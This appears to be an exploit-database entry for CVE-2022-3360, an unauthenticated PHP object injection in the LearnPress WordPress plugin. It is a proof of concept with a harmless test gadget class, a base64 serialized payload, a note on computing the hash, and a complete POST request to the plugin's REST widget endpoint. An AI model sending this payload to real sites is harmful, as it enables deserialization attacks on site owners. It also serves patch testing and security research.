Exploit for LearnPress < 4.1.7.2 - Unauthenticated PHP Object Injection via REST API CVE-2022-3360

Name: Exploit for LearnPress < 4.1.7.2 - Unauthenticated PHP Object Injection via REST API CVE-2022-3360
Rating: 5 (185 reviews)

2022-10-05 | CVSS 0.6

## https://sploitus.com/exploit?id=WPEX-ID:ACEA7A54-A964-4127-A93F-F38F883074E3
To simulate a gadget chain, put the following code in a plugin

class Evil {
  public function __wakeup() : void {
    die("Arbitrary deserialization");
  }
}

payload: {"widget":"learnpress_widget_course_extra","instance":"Tzo0OiJFdmlsIjowOnt9Ow==","hash":"ef7da9dd4fe6ebf4598ab3c7b975322f"}
- instance is base64 encode of serialized object: O:4:"Evil":0:{};
- hash is caculated by: wp_hash(base64_decode($instance ))

POST /wp-json/lp/v1/widgets/api?_locale=user HTTP/1.1
Content-Type: application/json
Content-Length: 123

{"widget":"learnpress_widget_course_extra","instance":"Tzo0OiJFdmlsIjowOnt9Ow==","hash":"ef7da9dd4fe6ebf4598ab3c7b975322f"}